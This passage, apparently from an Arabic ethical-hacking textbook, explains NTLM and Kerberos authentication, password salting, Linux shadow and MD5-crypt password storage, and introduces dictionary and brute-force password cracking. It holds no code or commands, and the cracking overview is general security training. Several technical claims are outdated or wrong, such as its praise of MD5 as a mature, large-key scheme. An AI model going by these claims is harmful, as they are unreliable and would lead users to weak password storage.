-2اﻟﻣﻠﻘم ﯾﺳﺗﺟﯾب ﻣﻊ رﺳﺎﻟﺔ ﻧوع .2وھذا ﯾﺣﺗوي ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﺑﺎﻟﻣﯾزات اﻟﻣﺗﻔﻖ ﻋﻠﯾﮭﺎ ﻣن ﻗﺑل اﻟﻣﻠﻘم .اﻷھم ﻣن ذﻟك ،وﻣﻊ ذﻟك ،ﻓﺈﻧﮫ
ﯾﺣﺗوي ﻋﻠﻰ challengeواﻟذي ﺗم إﻧﺷﺎؤھﺎ ﺑواﺳطﺔ اﻟﻣﻠﻘم.
-3اﻟﻌﻣﯾل ﯾﻘوم ﺑﺎﻟرد ﻋﻠﻰ challengeﻣﻊ رﺳﺎﻟﺔ ﻧوع .3وھذا ﯾﺣﺗوي ﻋﻠﻰ ﻋدة أﺟزاء ﻣن اﻟﻣﻌﻠوﻣﺎت ﺣول اﻟﻌﻣﯾل ،ﺑﻣﺎ ﻓﻲ ذﻟك
اﻟدوﻣﯾن واﺳم اﻟﻣﺳﺗﺧدم ﻟﻠﻣﺳﺗﺧدم اﻟﻌﻣﯾل.
NTLM Authentication Process
ﻋﻣﻠﯾﺔ ﻣﺻﺎدﻗﺔ اﻟﻌﻣﯾل إﻟﻰ وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن ﺑﺎﺳﺗﺧدام أي ﻣن ﺑروﺗوﻛوﻻت NTLMﺗظﮭر ﻣن ﺧﻼل اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ:
ﯾﻘوم اﻟﻌﻣﯾل ﺑﻛﺗﺎﺑﺔ اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﻣرور ﻓﻲ إطﺎر ﺗﺳﺟﯾل اﻟدﺧول. o
ﯾﻘوم ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﺑﺗﺷﻐﯾل ﻛﻠﻣﺔ اﻟﻣرور ﻣن ﺧﻼل ﺧوارزﻣﯾﺔ اﻟﮭﺎش وﯾﻘوم ﺑﺈﻧﺷﺎء اﻟﮭﺎش ﻟﻛﻠﻣﺔ اﻟﻣرور اﻟذي ﺗم إدﺧﺎﻟﮫ ﻣن o
ﺧﻼل إطﺎر ﺗﺳﺟﯾل اﻟدﺧول.
ﻛﻣﺑﯾوﺗر اﻟﻌﻣﯾل ﯾﻘوم ﺑﺈرﺳﺎل طﻠب ﺗﺳﺟﯾل اﻟدﺧول ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ اﺳم اﻟدوﻣﯾن إﻟﻰ وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن. o
وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن ﯾوﻟد ﺳﻠﺳﻠﺔ أﺣرف ﻋﺷواﺋﯾﺔ 16ﺑﺎﯾت ﯾﺳﻣﻰ " "nonceوﯾرﺳﻠﮭﺎ إﻟﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر اﻟﻌﻣﯾل. o
ﻛﻣﺑﯾوﺗر اﻟﻌﻣﯾل ﯾﻘوم ﺑﺗﺷﻔﯾر nonceﻣﻊ ھﺎش ﻛﻠﻣﺔ ﻣرور اﻟﻣﺳﺗﺧدم وإرﺳﺎﻟﮫ إﻟﻰ وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن. o
وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن ﺗﺳﺗرد ھﺎش ﻛﻠﻣﺔ ﻣرور اﻟﻣﺳﺗﺧدم ﻣن SAMوﯾﺳﺗﺧدم ﻟﺗﺷﻔﯾر .nonceوﺣدة ﺗﺣﻛم اﻟدوﻣﯾن ﯾﻘﺎرن اﻟﻘﯾﻣﺔ o
اﻟﻣﺷﻔرة ﻣﻊ اﻟﻘﯾﻣﺔ اﻟواردة ﻣن اﻟﻌﻣﯾل .إذا ﺗطﺎﺑﻘت اﻟﻘﯾم ،ﻓﺗﻧﺟﺢ ﻣﺻﺎدﻗﺔ اﻟﻌﻣﯾل وﺗﺳﺟﯾل اﻟدﺧول.
Kerberos
Kerberosھو ﺑروﺗوﻛول ﻣﺻﺎدﻗﺔ اﻟﺷﺑﻛﺔ) . (network authentication protocolوھﻲ ﻣﺻﻣﻣﺔ ﻟﺗوﻓﯾر ﻣﺻﺎدﻗﺔ ﻗوﯾﺔ ﻟﻠﺗطﺑﯾﻘﺎت
اﻟﻌﻣﯾل/اﻟﺧﺎدم ﺑﺎﺳﺗﺧدام .secret-key cryptographyوھذا ﯾوﻓر اﻟﻣﺻﺎدﻗﺔ اﻟﻣﺗﺑﺎدﻟﺔ .ﺣﯾث ﻛل ﻣن اﻟﺧﺎدم واﻟﻣﺳﺗﺧدم ﯾﺗﺣﻘﻘﺎ ﻣن ھوﯾﺔ ﻛل
ﻣﻧﮭﻣﺎ اﻵﺧر .اﻟرﺳﺎﺋل اﻟﻣرﺳﻠﺔ ﻣن ﺧﻼل ﺑروﺗوﻛول Kerberosﻣﺣﻣﯾﺔ ﺿد ھﺟﻣﺎت إﻋﺎدة اﻟﺗﺷﻐﯾل واﻟﺗﻧﺻت.
Kerberosﯾﺟﻌل ﻣن اﺳﺗﺧدام )) Key Distribution Center (KDCﺧﺎدم ﻟﺗوزﯾﻊ اﻟﻣﻔﺎﺗﯾﺢ( ،طرف ﺛﺎﻟث ﻣوﺛوق ﺑﮫ .ھذا ﯾﺗﻛون ﻣن
ﻗﺳﻣﯾن ﻣﻧﻔﺻﻠﯾن ﻣﻧطﻘﯾﺎ :ﺧﺎدم اﻟﻣﺻﺎدﻗﺔ )) (Authentication server (ASوﺧﺎدم ﻣﻧﺢ اﻟﺗذاﻛر )).(Ticket Granting Server (TGS
Kerberosﯾﻌﻣل ﻋﻠﻰ أﺳﺎس "اﻟﺗذاﻛر) " (ticketsﻹﺛﺑﺎت ھوﯾﺔ اﻟﻣﺳﺗﺧدم.
آﻟﯾﺔ ﺗﻔوﯾض Kerberosﺗﻌﺗﻣد ﻋﻠﻰ ﺗوﻓﯾر ﺗذﻛره ﻟﻠﻣﺳﺗﺧدم ﻣﻊ ) Ticket Granting Ticket (TGTاﻟذي ﯾﺧدم ﻣﺷﺎرﻛﺔ اﻟﻣﺻﺎدﻗﺔ
ﻟﻠوﺻول ﻻﺣﻘﺎ إﻟﻰ ﺧدﻣﺎت ﻣﻌﯾﻧﺔ ،اﻟدﺧول اﻟﻣوﺣد اﻟذي ﻻ ﯾطﻠب ﻣن اﻟﻣﺳﺗﺧدم إﻋﺎدة إدﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور ﻣرة أﺧرى ﻟﻠوﺻول إﻟﻰ أﯾﺔ ﻣن
اﻟﺧدﻣﺎت اﻟﺗﻲ ﯾؤذن ﻟﮭﺎ .ﻣن اﻟﻣﮭم أن ﻧﻼﺣظ أﻧﮫ ﻟن ﯾﻛون ھﻧﺎك اﺗﺻﺎل ﻣﺑﺎﺷر ﺑﯾن ﺧوادم اﻟﺗطﺑﯾﻘﺎت وﻣرﻛز ﺗوزﯾﻊ اﻟﻣﻔﺎﺗﯾﺢ )(KDC
Key Distribution Center؛ ﺧدﻣﺔ اﻟﺗذاﻛر ،ﺣﺗﻰ ﻟو ﺗم ﺗﺣزﯾﻣﮭﺎ ) (packetedﺑواﺳطﺔ ،TGSواﻟوﺻول إﻟﻰ اﻟﺧدﻣﺔ ﯾﻛون ﻓﻘط ﻣن
ﺧﻼل اﻟﻌﻣﯾل اﻟذى ﯾرﻏب ﻓﻲ اﻟوﺻول إﻟﯾﮭﺎ.
Salting
Saltingھو وﺳﯾﻠﺔ ﻟﺟﻌل ﻛﻠﻣﺎت اﻟﻣرور أﻛﺛر أﻣﻧﺎ ﻋن طرﯾﻖ إﺿﺎﻓﺔ ﺳﻼﺳل ﻋﺷواﺋﯾﺔ ﻣن اﻟﺣروف إﻟﻰ ﻛﻠﻣﺎت اﻟﻣرور ﻗﺑل ﺣﺳﺎب ھﺎش
MD5اﻟﺧﺎﺻﺔ ﺑﮭم .وھذا ﯾﺟﻌل ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر أﺻﻌب .ﻛﻠﻣﺎ زاد أطول اﻟﺳﻠﺳﻠﺔ اﻟﻌﺷواﺋﯾﺔ ،ﻛﻠﻣﺎ ازدادت ﺻﻌوﺑﺔ ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر.
ﯾﺟب أن ﺗﻛون ﺳﻠﺳﻠﺔ اﻷﺣرف اﻟﻌﺷواﺋﯾﺔ ﻣزﯾﺞ ﻣن اﻷﺣرف اﻷﺑﺟدﯾﺔ اﻟرﻗﻣﯾﺔ .ﻣﺳﺗوى اﻷﻣﺎن أو ﻗوة ﺣﻣﺎﯾﺔ ﻛﻠﻣﺎت اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك ﺿد
ھﺟﻣﺎت ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺧﺗﻠﻔﺔ ﺗﻌﺗﻣد ﻋﻠﻰ طول ﺳﻠﺳﻠﺔ اﻟﻌﺷواﺋﯾﺔ ﻟﻸﺣرف .ھذه ﯾداﻓﻊ ﺿد .pre-computed hash attacks
ﻓﻲ ﻋﻠم اﻟﺗﺷﻔﯾر ،ﻓﺎن saltingﯾﺗﻛون ﻣن ﺑﺗﺎت ﻋﺷواﺋﯾﺔ ) (random bitاﻟﺗﻲ ﺗﺳﺗﺧدم ﻛﺄﺣد اﻟﻣدﺧﻼت إﻟﻰ وظﯾﻔﺔ ﻓﻲ اﺗﺟﺎه واﺣد وﻏﯾرھﺎ
ﻣن اﻟﻣدﺧﻼت ھو ﻛﻠﻣﺔ اﻟﺳر .ﺑدﻻ ﻣن ﻛﻠﻣﺎت اﻟﺳر ،ﻓﻧﺎﺗﺞ وظﯾﻔﺔ ﻓﻲ اﺗﺟﺎه واﺣد ﯾﻣﻛن ﺗﺧزﯾﻧﮭﺎ واﺳﺗﺧداﻣﮭﺎ ﻟﻣﺻﺎدﻗﺔ اﻟﻣﺳﺗﺧدﻣﯾن .ﯾﻣﻛن أﯾﺿﺎ
ﺿم saltingﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور ﻋن طرﯾﻖ key derivation functionﻟﺗوﻟﯾد ﻣﻔﺗﺎح ﻟﻼﺳﺗﺧدام ﻣن ﻗﺑل اﻟﻧص اﻟﻣﺷﻔر او ﻏﯾرھﺎ ﻣن
ﺧوارزﻣﯾﺎت اﻟﺗﺷﻔﯾر.
ﻣﻊ ھذه اﻟﺗﻘﻧﯾﺔ ﯾﻣﻛن أن ﺗﺗوﻟد ھﺎﺷﺎت ﻣﺧﺗﻠﻔﺔ ﻟﻧﻔس ﻛﻠﻣﺔ اﻟﻣرور .وھذا ﯾزﯾد ﻣن ﺻﻌوﺑﺔ اﻟﻣﮭﻣﺔ ﻋﻠﻰ اﻟﻣﮭﺎﺟم ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر اﻟﺻﻌﺑﺔ.
ﻓﻲ ھذا اﻟﻣﺛﺎل ،واﺛﻧﯾن ﻣن اﻟﻣﺳﺗﺧدﻣﯾن أﻟﯾس وﺳﯾﺳﯾل ﻟﮭﺎ ﻧﻔس ﻛﻠﻣﺎت اﻟﺳر وﻟﻛن ﻣﻊ ﻗﯾم ھﺎش ﻣﺧﺗﻠﻔﺔ .ﺣﯾث ﯾﺗم إﻧﺷﺎء ھﺎش ﻋﺷواﺋﻲ ﻟﻛل
ﻣﺳﺗﺧدم ﻋﻠﻰ ﺣدة:
Linux Authentication
ﺗﻨﻔﯿﺬ اﻟﺴﯿﺎﺳﺎت اﻟﺘﻲ ﺗﺘﺤﻜﻢ ﻓﻲ ﻛﯿﻔﯿﺔ اﻟﻮﻟﻮج إﻟﻰ ﻣﻮارد ﺟﮭﺎز اﻟﺘﺸﻐﯿﻞ ،وﻣﺪى ھﺬا اﻟﻮﻟﻮج ،أﻣﺮ أﺳﺎﺳﻲ ﻷﻣﻦ اﻟﻜﻤﺒﯿﻮﺗﺮ .أﻧﻈﻤﺔ اﻟﻜﻤﺒﯿﻮﺗﺮ اﻟﺤﺪﯾﺜﺔ
ﺗﻨﻔﯿﺬ ھﺬه اﻟﺴﯿﺎﺳﺎت ﺑﺎﺳﺘﺨﺪام ﻧﻤﻮذج اﻟﻤﺴﺘﺨﺪم]) ،[(user_modelاﻟﺬي ﯾﻌﯿﻦ اﻣﺘﯿﺎزات ﻣﻌﯿﻨﺔ ﻟﺒﻌﺾ اﻟﻤﺴﺘﺨﺪﻣﯿﻦ
ﻧﻤﺎذج اﻟﻤﺴﺘﺨﺪم ]) ،[(user_modelﺗﻌﻤﻞ ﻋﻠﻰ اﻟﺠﻤﻊ ﺑﯿﻦ إﺟﺎﺑﺘﯿﻦ ﻋﻠﻰ ﺳﺆاﻟﯿﻦ ﻣﺨﺘﻠﻔﯿﻦ:
اﻷول ھﻮ اﻻﺳﺘﯿﺜﺎق/اﻟﻤﺼﺎدﻗﺔ ]) :[(authenticationھﻞ ھﺬا ھﻮ اﻟﻤﺴﺘﺨﺪم اﻟﺬي أﻋﺘﻘﺪ أﻧﮫ ھﻮ؟
ً
واﻟﺜﺎﻧﻲ ھﻮ اﻟﺘﺼﺮﯾﺢ]) :[(Authorizationاﻵن أﻧﻨﻲ ﻣﻘﺘﻨﻊ ﺑﺄﻧﻨﻲ أﻋﺮف ھﻮﯾﺔ ھﺬا اﻟﻤﺴﺘﺨﺪم ،ﻣﺎ ھﻲ اﻟﻤﻮارد اﻟﺘﻲ ﯾﻨﺒﻐﻲ أن ﯾﻜﻮن ﻗﺎدرا ﻋﻠﻰ
اﻟﻮﺻﻮل إﻟﯿﮭﺎ؟
-اﻟﺮد ﻋﻠﻰ اﻟﺴﺆال اﻷول ﻣﻦ ﻗﺒﻞ ][user authentication
-اﻟﺮد ﻋﻠﻰ اﻟﺜﺎﻧﻲ ﻣﻦ ﺧﻼل رﺑﻂ ﻣﻌﻠﻮﻣﺎت اﻟﺤﺴﺎب ]) [(account informationﻣﻊ ھﻮﯾﺔ اﻟﻤﺼﺎدﻗﺔ.
ﻛﻠﻤﺔ اﻟﻤﺮور اﻟﻤﺸﻔﺮة )ﻓﻲ اﻟﺤﻘﻞ اﻟﺜﺎﻧﻲ( ﺗﻮﻓﺮ ﻋﻤﻠﯿﺔ اﻟﻤﺼﺎدﻗﺔ ])" :[(authenticationإذا ﻛﻨﺖ ﺣﻘﺎ أﻟﻔﯿﺲ ،أﻋﻄﻨﻨﻲ ﻛﻠﻤﺔ اﻟﻤﺮور اﻟﻔﯿﺲ".
إذا ﺣﺪﺛﺖ اﻟﻤﺼﺎدﻗﺔ ﺑﺸﻜﻞ ﺻﺤﯿﺢ ،ﻓﺎن اﻟﻨﻈﺎم ﯾﻔﺘﺮض أن ﻣﻦ ﻗﺎم ﺑﺘﺴﺠﯿﻞ اﻟﺪﺧﻮل ھﻮ ﺣﻘﺎ أﻟﻔﯿﺲ .وﺑﻤﺠﺮد إﻧﺸﺎء ﺑﯿﺎﻧﺎت اﻟﻤﺴﺘﺨﺪم ،ﻓﺎن اﻟﻤﻠﻒ
/etc/passwdﯾﻮﻓﺮ ﻣﻌﻠﻮﻣﺎت أﺧﺮى ﻋﻦ اﻟﻤﺴﺘﺨﺪم أﻟﻔﯿﺲ :ﻣﺜﻞ UIDو GIDو home directoryوﻧﻮع اﻟﺸﻞ اﻻﻓﺘﺮاﺿﻲ ﻟﮫ.
ﻓﯿﻤﺎ ﺑﻌﺪ أﺻﺒﺤﺖ أﻧﻈﻤﺔ ﯾﻮﻧﻜﺲ أﻛﺜﺮ ﻗﻠﻘﺎ ﻋﻠﻰ اﻷﻣﻦ ،وﻗﺪ وﺟﮭﺖ ھﺬه اﻟﺮﻗﺎﺑﺔ ﻣﻊ ﺗﻘﻨﯿﺔ ﺗﺴﻤﻰ ﻛﻠﻤﺎت اﻟﺴﺮ اﻟﻈﻞ]): [(shadow passwords
ﺣﯿﺚ ﺗﻢ ﻧﻘﻞ ﻛﻠﻤﺎت اﻟﻤﺮور إﻟﻰ اﻟﻤﻠﻒ ] [/etc/shadowﻣﻠﻒ أﻛﺜﺮ أﻣﻨﺎ ،ﺛﻢ ﯾﻀﻊ ﻣﻜﺎﻧﮫ اﻟﺮﻣﺰ Xﻓﻲ اﻟﻤﻠﻒ ].[/etc/passwd
ﻣﺎذا ﯾﺤﺪث ﻋﻨﺪ ﺗﻌﯿﯿﻦ ﻛﻠﻤﺔ ﻣﺮور اﻟﻔﯿﺲ "“appleﻣﻊ اﻷﻣﺮ passwd؟
اﻟﻨﻈﺎم ﯾﻘﻮم ﺑﺎﻟﺒﺤﺚ ﻋﻦ اﻟﺤﺮﻓﯿﻦ ﻣﻦ اﻟﻤﻠﺢ ][saltﻣﻦ اﻟﻤﻠﻒ /etc/passwdوﯾﻘﻮم ﺑﺈﺿﺎﻓﺘﮫ إﻟﻰ ﻛﻠﻤﺔ اﻟﻤﺮور. -
ﯾﺴﺘﺨﺪم ﻧﻈﺎم ﻛﻠﻤﺔ اﻟﻤﺮور إﻧﺸﺎء cyphertextﻣﻦ ﻛﻠﻤﺔ اﻟﺴﺮ اﻟﻤﻤﻠﺤﺔ ] [salted passwordواﻟﻰ ﯾﻨﺘﺞ ﻣﻜﻮن 11ﺣﺮف. -
ﺛﻢ ﯾﻘﻮم اﻟﻨﻈﺎم ﺑﻤﻘﺎرﻧﺔ cyphertextإﻟﻰ ﻣﺎ ﺗﻢ ﺗﺨﺰﯾﻨﮫ ﻓﻲ ./etc/passwdإذا ﻛﺎﻧﺖ ﺗﻄﺎﺑﻖ ،ﺗﺴﻤﺢ ﻟﻠﻤﺴﺘﺨﺪم ﺑﺎﻟﻮﻟﻮج. -
Password Management
ﺟﻌﻠﺖ أﻧﻈﻤﺔ ﻟﯿﻨﻜﺲ اﻟﺤﺪﯾﺜﺔ اﺛﻨﯿﻦ ﻣﻦ اﻟﺘﺤﺴﯿﻨﺎت ﻟﻠﺘﻘﻨﯿﺔ اﻟﺘﻘﻠﯿﺪﯾﺔ اﻟﻤﺬﻛﻮرة أﻋﻼه.
أوﻻ ،وﻛﻤﺎ ﺳﺒﻖ ذﻛﺮه ،أﻧﻈﻤﺔ ﻟﯿﻨﻜﺲ اﻟﺤﺪﯾﺜﺔ اﺳﺘﺨﺪام ﻛﻠﻤﺎت اﻟﻤﺮور اﻟﻈﻞ]) [(shadow passwordﻟﺘﺨﺰﯾﻦ، cypthertext
ﺑﺤﯿﺚ ﺣﺘﻰ ﻛﻠﻤﺎت اﻟﺴﺮ اﻟﻤﺸﻔﺮة ﻟﯿﺴﺖ ﻣﺘﺎﺣﺔ ﻟﻠﺠﻤﮭﻮر.
ﺛﺎﻧﯿﺎ ،أﻧﻈﻤﺔ ﻟﯿﻨﻜﺲ اﻟﯿﻮم اﺳﺘﺨﺪام ﺧﻮارزﻣﯿﺔ MD5أﻛﺜﺮ ﻧﻀﺠﺎ.
ﯾﺴﺘﺨﺪم ﯾﻮﻧﻜﺲ ﺑﺮوﺗﻮﻛﻮل اﻟﺘﺸﻔﯿﺮ اﻟﺘﻘﻠﯿﺪﯾﺔ واﻟﺘﻲ ﺑﺪورھﺎ ﺗﺴﺘﺨﺪم ﻣﻌﺪﻟﺔ DESﺧﻮارزﻣﯿﺔ اﻟﺘﺸﻔﯿﺮ ﻋﻠﻰ أﺳﺎس ﻣﻔﺘﺎح ﺑﺖ .56
وﻧﺘﯿﺠﺔ ﻟﺬﻟﻚ ،أﺻﺒﺤﺖ ﻛﻠﻤﺎت اﻟﺴﺮ ﻣﺤﺪودة ﻓﻘﻂ 8أﺣﺮف ﻣﻦ اﻟﻨﻮع 8) ASCII:أﺣﺮف( * ) 7ﺑﺖ /ﺣﺮف( = ) 56ﺑﺖ(.
أﻧﻈﻤﺔ ﻟﯿﻨﻜﺲ اﻟﯿﻮم ﺗﺴﺘﺨﺪم ﻛﻠﻤﺔ اﻟﺴﺮ ذات ﺧﻮارزﻣﯿﺔ اﻟﺘﺸﻔﯿﺮ ،[MD5 password] MD5واﻟﺬي ﯾﺴﺘﺨﺪم ﻟﻠﺘﺸﻔﯿﺮ اﻷﻛﺜﺮ ﻧﻀﺠﺎ واﻟﺬي
ﯾﺴﺘﻨﺪ إﻟﻰ ﻣﻔﺘﺎح أﻛﺒﺮ ﺑﻜﺜﯿﺮ.
اﻷداة system-config-authenticationﺗﺳﺗﺧدم ﻟﺗﺣوﯾل ﺑﯾن أي ﻧظﺎم ﻣﺳﺗﺧدم ﻓﻲ ﺗﺷﻔﯾر اﻟرﻗم اﻟﺳري ﺳواء md5 passwordأو
shadow passwordﻓﻲ أﻧظﻣﺔ اﻟﺗﺷﻐﯾل رﯾدھﺎت وﻓﯾدورا.
ﺛﺎﻧﯿﺎ ،ﻛﻠﻤﺔ اﻟﺴﺮ اﻟﻤﺸﻔﺮة MD5اﻵن ﺗﻨﻘﺴﻢ إﻟﻰ ﺛﻼﺛﺔ ﻣﺠﺎﻻت ﯾﻤﻜﻦ ﺗﻤﯿﯿﺰھﺎ ﺑﺴﮭﻮﻟﺔ ،ﺗﺤﺪد ﺑﻮاﺳﻄﺔ ﻋﻼﻣﺔ اﻟﺪوﻻر )".("$
اﻟﺤﻘﻞ اﻷول )" ("1ھﻮ ﻣﻌﺮف اﻟﺒﺮوﺗﻮﻛﻮل ،وﺗﻮﻓﯿﺮ آﻟﯿﺔ ﻟﻠﺘﺮﺣﯿﻞ ﺑﺴﮭﻮﻟﺔ إﻟﻰ ﺑﺮوﺗﻮﻛﻮﻻت ﻣﺨﺘﻠﻔﺔ ﻓﻲ اﻟﻤﺴﺘﻘﺒﻞ . MD5وھﻮ ﺑﺮوﺗﻮﻛﻮل "".1
اﻟﺤﻘﻞ اﻟﺜﺎﻧﻲ ،"CBYGbXRT" ،ھﻮ اﻟﻤﻠﺢ ،واﻟﺘﻲ ﺗﻮﺳﻌﺖ اﻵن إﻟﻰ 8أﺣﺮف.
اﻟﺤﻘﻞ اﻷﺧﯿﺮ ،"xTMRC01udINgd1LH/9quu1" ،ھﻮ cyphertextﻧﺘﯿﺠﺔ ﻟﻠﺘﺸﻔﯿﺮ.
https://www.facebook.com/tibea2004 د .ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ
322
Password crackingھﻲ اﻟﺗﻘﻧﯾﺔ اﻟﻣﺳﺗﺧدﻣﺔ ﻻﻛﺗﺷﺎف ﻛﻠﻣﺎت اﻟﻣرور .ھذا ھو اﻟﺳﺑﯾل ﻟﻛﺳب اﻻﻣﺗﯾﺎزات اﻟﻛﻼﺳﯾﻛﯾﺔ ﻟﻧظﺎم اﻟﻛﻣﺑﯾوﺗر أو
اﻟﺷﺑﻛﺔ .اﻟﻧﮭﺞ اﻟﻣﺷﺗرك ﻟﻛﺳر ﻛﻠﻣﺔ ﻣرور ھو اﺳﺗﻣرار ﻣﺣﺎوﻟﺔ ﺗﺧﻣﯾن ﻛﻠﻣﺔ اﻟﻣرور ﻣﻊ ﺗوﻟﯾﻔﺎت ﻣﺧﺗﻠﻔﺔ ﺣﺗﻰ ﺗﺣﺻل اﻟﻰ واﺣدة ﺻﺣﯾﺣﺔ.
ھﻧﺎك ﺧﻣﺳﺔ أﺳﺎﻟﯾب ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ،ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ.
DICTIONARY ATTACKS
ﻓﻲ ،dictionary attackﯾﺗم ﺗﺣﻣﯾل ﻣﻠف dictionaryإﻟﻰ ﺗطﺑﯾﻖ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ) (Cracking applicationاﻟذي ﯾﺳﺗﺧدم ﺿد
ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن .ھذا اﻟﻣﻠف ھو ﻣﻠف ﻧﺻﻲ ﯾﺣﺗوي ﻋﻠﻰ ﻋدد ﻣن ﻛﻠﻣﺎت اﻟﻘﺎﻣوس ) .(dictionary wordﯾﺳﺗﺧدم اﻟﺑرﻧﺎﻣﺞ ﻛل ﻛﻠﻣﺔ
ﻣوﺟودة ﻓﻲ اﻟﻘﺎﻣوس ﻟﻠﻌﺛور ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﺳر Dictionary attack .أﻛﺛر ﻓﺎﺋدة ﻣن ھﺟﻣﺎت اﻟﻘوة اﻟﻐﺎﺷﻣﺔ (brute forcing attack).
وﻟﻛن ھذا اﻟﮭﺟوم ﻻ ﯾﻌﻣل ﻣﻊ اﻷﻧظﻣﺔ اﻟﺗﻲ ﺗﺳﺗﺧدم .passphrases
ﻋﻧدﻣﺎ ﯾﺣﺎول ﺷﺧص ﻣﺎ ﯾﻧﺗﺞ ﻛل ﻣﻔﺗﺎح ﺗﺷﻔﯾر واﺣد ﻟﻠﺑﯾﺎﻧﺎت ﺣﺗﻰ ﯾﺗم اﻟﻛﺷف ﻋن اﻟﻣﻌﻠوﻣﺎت اﻟﻣطﻠوﺑﺔ ،وھذا ﻣﺎ ﯾطﻠﻖ ﻋﻠﯾﮫ ھﺟوم اﻟﻘوة
اﻟﻐﺎﺷﻣﺔ .ﺣﺗﻰ ھذا اﻟﺗﺎرﯾﺦ ،ﺗم ﺗﻧﻔﯾذ ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﻣن ﻗﺑل أوﻟﺋك اﻟذﯾن ﻟدﯾﮭم ﻣﺎ ﯾﻛﻔﻲ ﻣن ﻗوة اﻟﻣﻌﺎﻟﺟﺔ.
ﺣﻛوﻣﺔ اﻟوﻻﯾﺎت اﻟﻣﺗﺣدة )ﻓﻲ ﻋﺎم (1977ﺗﻌﺗﻘد أن ﻣﻌﯾﺎر ﺗﺷﻔﯾر اﻟﺑﯾﺎﻧﺎت 56ﺑت ) (DESﻛﺎﻓﻲ ﻟردع ھﺟﻣﺎت اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ،وﻗﺎﻟت ﺑﺄﻧﮫ ﺗم
اﺧﺗﺑﺎر ذﻟك ﻋﻠﻰ ﻣﺟﻣوﻋﺎت ﻓﻲ ﺟﻣﯾﻊ أﻧﺣﺎء اﻟﻌﺎﻟم.
ﺗﺣﻠﯾل اﻟﺷﻔرات ھو ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ﻋﻠﻰ اﻟﺗﺷﻔﯾر ﻟﺑﺣث اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ﻋﻠﻰ . keyspaceوﺑﻌﺑﺎرة أﺧرى ھو اﺧﺗﺑﺎر ﺟﻣﯾﻊ اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ
ﻟدﯾﻧﺎ ﻓﻲ ﻣﺣﺎوﻟﺔ ﻻﺳﺗرداد اﻟﻧص اﻟﻌﺎدي اﻟذي اﺳﺗﺧدم ﻹﻧﺗﺎج اﻟﻧص اﻟﻣﺷﻔر .اﻛﺗﺷف اﻟﻣﻔﺗﺎح أو اﻟﻧص اﻟﻌﺎدي ﻣﻊ وﺗﯾرة أﺳرع ﺑﺎﻟﻣﻘﺎرﻧﺔ ﻣﻊ
ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ﯾﻣﻛن اﻋﺗﺑﺎر وﺳﯾﻠﺔ ﻟﻛﺳر اﻟﻧص اﻟﻣﺷﻔر] .[cipherاﻟﻧص اﻟﻣﺷﻔر] [cipherھو اﻣن ﻓﻲ ﺣﺎﻟﺔ ﻋدم وﺟود أي طرﯾﻘﺔ
ﻟﻛﺳر ھذا اﻟﺗﺷﻔﯾر ﻏﯾر ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ .ﻓﻲ اﻟﻐﺎﻟب ،ﻛل اﻟﻧﺻوص اﻟﻣﺷﻔر ) (ciphersﻗﺎﺻره ﻋﻠﻰ اﻣن اﻟﻌﻣﻠﯾﺔ اﻟرﯾﺎﺿﯾﺔ اﻟﻣﺳﺗﺧدم ﻓﻲ
ﻋﻣﻠﯾﺔ اﻟﺗﺷﻔﯾر.
إذا ﺗم اﺧﺗﯾﺎر ﻣﻔﺎﺗﯾﺢ أﺻﻠﻰ ﺑطرﯾﻘﮫ ﻋﺷواﺋﯾﺔ أو اﻟﺑﺣث ﻋﻧﮫ ﺑﺷﻛل ﻋﺷواﺋﻲ ،ﻓﺎن اﻟﻧص اﻟﻌﺎدي ،ﻓﻲ اﻟﻣﺗوﺳط ،ﺳوف ﯾﺻﺑﺢ ﻣﺗﺎح ﺑﻌد اﺳﺗﺧدام
ﻧﺻف ﺟﻣﯾﻊ ﻣﻔﺎﺗﯾﺢ اﻟﻣﻣﻛﻧﺔ.
ﺑﻌض اﻻﻋﺗﺑﺎرات اﻟﺗﻲ ﯾﺟب ان ﺗﻌرﻓﮭﺎ ﺣول ھﺟﻣﺎت اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ھﻲ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ:
-اﻟﻌﻣﻠﯾﺔ ﺗﺳﺗﻐرق وﻗﺗﺎ طوﯾﻼ.
-ﻓﻲ ﻧﮭﺎﯾﺔ اﻟﻣطﺎف ﯾﻣﻛن اﻟﻌﺛور ﻋﻠﻰ ﺟﻣﯾﻊ ﻛﻠﻣﺎت اﻟﺳر.
-اﻟﮭﺟﻣﺎت ﺿد NT hashesھﻲ أﺻﻌب ﺑﻛﺛﯾر ﻣن .LM hashes
